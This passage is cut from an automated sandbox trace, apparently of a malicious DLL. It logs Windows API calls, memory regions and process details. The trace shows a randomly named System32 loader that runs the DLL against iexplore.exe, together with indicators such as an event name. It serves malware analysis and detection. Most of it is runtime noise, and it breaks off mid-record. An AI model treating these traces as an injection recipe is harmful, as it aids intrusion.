"c:\\users\\eebsym5\\desktop\\97328f~1.dll")) returned 0x25 [0035.597] GetModuleFileNameW (in: hModule=0x72ee0000, lpFilename=0x72f1e238, nSize=0x104 | out: lpFilename="C:\\Users\\EEBsYm5\\Desktop\\97328F~1.DLL" (normalized: "c:\\users\\eebsym5\\desktop\\97328f~1.dll")) returned 0x25 [0035.597] GetModuleFileNameA (in: hModule=0x72ee0000, lpFilename=0x72f1e440, nSize=0x104 | out: lpFilename="C:\\Users\\EEBsYm5\\Desktop\\97328F~1.DLL" (normalized: "c:\\users\\eebsym5\\desktop\\97328f~1.dll")) returned 0x25 [0035.597] OpenEventA (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="97ryuhf023") returned 0x74 [0035.597] AddAtomS () returned 0x0 [0035.598] HeapDestroy (hHeap=0x460000) returned 1 Process: id = "59" image_name = "gorctexxzx.exe" filename = "c:\\windows\\system32\\gorctexxzx.exe" page_root = "0x7ef4fac0" os_pid = "0xd48" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0xa3c" cmd_line = "\"C:\\Windows\\System32\\goRcteXxZX.exe\" /dll=\"C:\\Users\\EEBsYm5\\Desktop\\97328F~1.DLL\" /fn_id=AddAtomT /fn_args=\"iexplore.exe\"" cur_dir = "C:\\Windows\\system32\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f0e7" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 2586 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 2587 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 2588 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 2589 start_va = 0x70000 end_va = 0x16ffff entry_point = 0x0 region_type = private name = "private_0x0000000000070000" filename = "" Region: id = 2590 start_va = 0x11d0000 end_va = 0x11f0fff entry_point = 0x11d0000 region_type = mapped_file name = "gorctexxzx.exe" filename = "\\Windows\\System32\\goRcteXxZX.exe" (normalized: "c:\\windows\\system32\\gorctexxzx.exe") Region: id = 2591 start_va = 0x77e80000 end_va = 0x77e80fff entry_point = 0x77e80000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 2592 start_va = 0x77ec0000 end_va = 0x77ffbfff entry_point = 0x77ec0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 2593 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 2594 start_va = 0x7ffd9000 end_va = 0x7ffd9fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd9000" filename = "" Region: id = 2595 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 2596 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 2597 start_va = 0x170000 end_va = 0x1d6fff entry_point = 0x170000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 2598 start_va = 0x360000 end_va = 0x45ffff entry_point = 0x0 region_type = private name = "private_0x0000000000360000" filename = "" Region: id = 2599 start_va = 0x650000 end_va = 0x65ffff entry_point = 0x0 region_type = private name = "private_0x0000000000650000" filename = "" Region: id = 2600 start_va = 0x75f70000 end_va = 0x75fb9fff entry_point = 0x75f70000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 2601 start_va = 0x761d0000 end_va = 0x762a3fff entry_point = 0x761d0000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 2602 start_va = 0x76300000 end_va = 0x76356fff entry_point = 0x76300000 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 2603 start_va = 0x765f0000 end_va = 0x765f9fff entry_point = 0x765f0000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 2604 start_va = 0x767a0000 end_va = 0x773e9fff entry_point = 0x767a0000 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll") Region: id = 2605 start_va = 0x773f0000 end_va = 0x7748cfff entry_point = 0x773f0000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 2606 start_va = 0x77550000 end_va = 0x775f0fff entry_point = 0x77550000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 2607 start_va = 0x77720000 end_va = 0x777cbfff entry_point = 0x77720000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 2608 start_va = 0x77970000 end_va = 0x77acbfff entry_point = 0x77970000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 2609 start_va = 0x77ad0000 end_va = 0x77b98fff entry_point = 0x77ad0000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 2610 start_va = 0x77c80000 end_va = 0x77ccdfff entry_point = 0x77c80000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 2611 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 2612 start_va = 0x1e0000 end_va = 0x2a7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001e0000" filename = "" Region: id = 2613 start_va = 0x762b0000 end_va = 0x762cefff entry_point = 0x762b0000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 2614 start_va = 0x77ba0000 end_va = 0x77c6bfff entry_point = 0x77ba0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 2615 start_va = 0x20000 end_va = 0x20fff entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 2616 start_va = 0x50000 end_va = 0x50fff entry_point = 0x0 region_type = private name = "private_0x0000000000050000" filename = "" Region: id = 2617 start_va = 0x460000 end_va = 0x560fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 2618 start_va = 0x1200000 end_va = 0x1dfffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001200000" filename = "" Region: id = 2619 start_va = 0x72db0000 end_va = 0x72db2fff entry_point = 0x72db0000 region_type = mapped_file name = "api-ms-win-core-synch-l1-2-0.dll" filename = "\\Windows\\System32\\api-ms-win-core-synch-l1-2-0.dll" (normalized: "c:\\windows\\system32\\api-ms-win-core-synch-l1-2-0.dll") Region: id = 2620 start_va = 0x72ee0000 end_va = 0x72f24fff entry_point = 0x72ee0000 region_type = mapped_file name = "97328f~1.dll" filename = "\\Users\\EEBsYm5\\Desktop\\97328F~1.DLL" (normalized: "c:\\users\\eebsym5\\desktop\\97328f~1.dll") Region: id = 2621 start_va = 0x762e0000 end_va = 0x762f8fff entry_point = 0x762e0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 2622 start_va = 0x76700000 end_va = 0x7679ffff entry_point = 0x76700000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 2623 start_va = 0x660000 end_va = 0x7effff entry_point = 0x0 region_type = private name = "private_0x0000000000660000" filename = "" Region: id = 2624 start_va = 0x77510000 end_va = 0x77544fff entry_point = 0x77510000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 2625 start_va = 0x762d0000 end_va = 0x762d5fff entry_point = 0x762d0000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 2626 start_va = 0x660000 end_va = 0x7cffff entry_point = 0x0 region_type = private name = "private_0x0000000000660000" filename = "" Region: id = 2627 start_va = 0x7e0000 end_va = 0x7effff entry_point = 0x0 region_type = private name = "private_0x00000000007e0000" filename = "" Thread: id = 124 os_tid = 0xd4c [0035.655] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x16f7f4 | out: lpSystemTimeAsFileTime=0x16f7f4*(dwLowDateTime=0xe2efae50, dwHighDateTime=0x1d3dfba)) [0035.655] GetCurrentProcessId () returned 0xd48 [0035.655] GetCurrentThreadId () returned 0xd4c [0035.655] GetTickCount () returned 0x18094 [0035.655] QueryPerformanceCounter (in: lpPerformanceCount=0x16f7ec | out: lpPerformanceCount=0x16f7ec*=375126945) returned 1 [0035.656] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0035.656] GetProcAddress (hModule=0x761d0000, lpProcName="FlsAlloc") returned 0x7622418d [0035.656] GetProcAddress (hModule=0x761d0000, lpProcName="FlsGetValue") returned 0x76221e16 [0035.656] GetProcAddress (hModule=0x761d0000, lpProcName="FlsSetValue") returned 0x762276e6 [0035.656] GetProcAddress (hModule=0x761d0000, lpProcName="FlsFree") returned 0x76221f61 [0035.656] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0035.656] GetProcAddress (hModule=0x761d0000, lpProcName="EncodePointer") returned 0x77f1a295 [0035.656] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0035.657] GetProcAddress (hModule=0x761d0000, lpProcName="EncodePointer") returned 0x77f1a295 [0035.657] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0035.657] GetProcAddress (hModule=0x761d0000, lpProcName="EncodePointer") returned 0x77f1a295 [0035.657] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0035.657] GetProcAddress (hModule=0x761d0000, lpProcName="EncodePointer") returned 0x77f1a295 [0035.657] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0035.657] GetProcAddress (hModule=0x761d0000, lpProcName="EncodePointer") returned 0x77f1a295 [0035.657] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0035.657] GetProcAddress (hModule=0x761d0000, lpProcName="EncodePointer") returned 0x77f1a295 [0035.657] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0035.657] GetProcAddress (hModule=0x761d0000, lpProcName="EncodePointer") returned 0x77f1a295 [0035.657] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0035.658] GetProcAddress (hModule=0x761d0000, lpProcName="DecodePointer") returned 0x77f1cd10 [0035.658] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0035.658] GetProcAddress (hModule=0x761d0000, lpProcName="DecodePointer") returned 0x77f1cd10 [0035.658] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0035.658] GetProcAddress (hModule=0x761d0000, lpProcName="EncodePointer") returned 0x77f1a295 [0035.658] GetProcAddress (hModule=0x761d0000, lpProcName="DecodePointer") returned 0x77f1cd10 [0035.658] GetCurrentThreadId () returned 0xd4c [0035.658] GetCommandLineA () returned="\"C:\\Windows\\System32\\goRcteXxZX.exe\" /dll=\"C:\\Users\\EEBsYm5\\Desktop\\97328F~1.DLL\" /fn_id=AddAtomT /fn_args=\"iexplore.exe\"" [0035.658] GetEnvironmentStringsW () returned 0x3778f0* [0035.658] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ALLUSERSPROFILE=C:\\ProgramData", cchWideChar=992, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 992 [0035.658] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ALLUSERSPROFILE=C:\\ProgramData", cchWideChar=992, lpMultiByteStr=0x7e09f0, cbMultiByte=992, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ALLUSERSPROFILE=C:\\ProgramData", lpUsedDefaultChar=0x0) returned 992 [0035.658] FreeEnvironmentStringsW (penv=0x3778f0) returned 1 [0035.658] GetStartupInfoA (in: lpStartupInfo=0x16f744 | out: lpStartupInfo=0x16f744*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\System32\\goRcteXxZX.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0xffffffff, hStdOutput=0xffffffff, hStdError=0xffffffff)) [0035.659] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0035.659] GetStdHandle (nStdHandle=0xfffffff5) returned 0x0 [0035.659] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0035.659] SetHandleCount (uNumber=0x20) returned 0x20 [0035.659] GetLastError () returned 0x0 [0035.659] SetLastError (dwErrCode=0x0) [0035.659] GetLastError () returned 0x0 [0035.659] SetLastError (dwErrCode=0x0) [0035.659] GetLastError () returned 0x0 [0035.659] SetLastError (dwErrCode=0x0) [0035.659] GetACP () returned 0x4e4 [0035.659] GetLastError () returned 0x0 [0035.659] SetLastError (dwErrCode=0x0) [0035.659] IsValidCodePage (CodePage=0x4e4) returned 1 [0035.659] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x16f724 | out: lpCPInfo=0x16f724) returned 1 [0035.659] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x16f1f0 | out: lpCPInfo=0x16f1f0) returned 1 [0035.659] GetLastError () returned 0x0 [0035.659] SetLastError (dwErrCode=0x0) [0035.659] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr="", cchSrc=1, lpCharType=0x16f180 | out: lpCharType=0x16f180) returned 1 [0035.659] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x16f604, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0035.659] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x16f604, cbMultiByte=256, lpWideCharStr=0x16ef68, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0035.659] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpCharType=0x16f204 | out: lpCharType=0x16f204) returned 1 [0035.659] GetLastError () returned 0x0 [0035.659] SetLastError (dwErrCode=0x0) [0035.659] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr="", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 1 [0035.659] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x16f604, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0035.659] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x16f604, cbMultiByte=256, lpWideCharStr=0x16ef38, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿꋥ矲狰Ā") returned 256 [0035.659] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿꋥ矲狰Ā", cchSrc=256, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 256 [0035.659] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿꋥ矲狰Ā", cchSrc=256, lpDestStr=0x16ed28, cchDest=256 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0035.659] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchWideChar=256, lpMultiByteStr=0x16f504, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿSTeô<÷\x16", lpUsedDefaultChar=0x0) returned 256 [0035.659] GetLastError () returned 0x0 [0035.659] SetLastError (dwErrCode=0x0) [0035.659] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x16f604, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0035.659] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x16f604, cbMultiByte=256, lpWideCharStr=0x16ef58, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿꋥ矲狰Ā") returned 256 [0035.659] LCMapStringW (in: Locale=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿꋥ矲狰Ā", cchSrc=256, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 256 [0035.660] LCMapStringW (in: Locale=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿꋥ矲狰Ā", cchSrc=256, lpDestStr=0x16ed48, cchDest=256 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸĀ") returned 256 [0035.660] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ 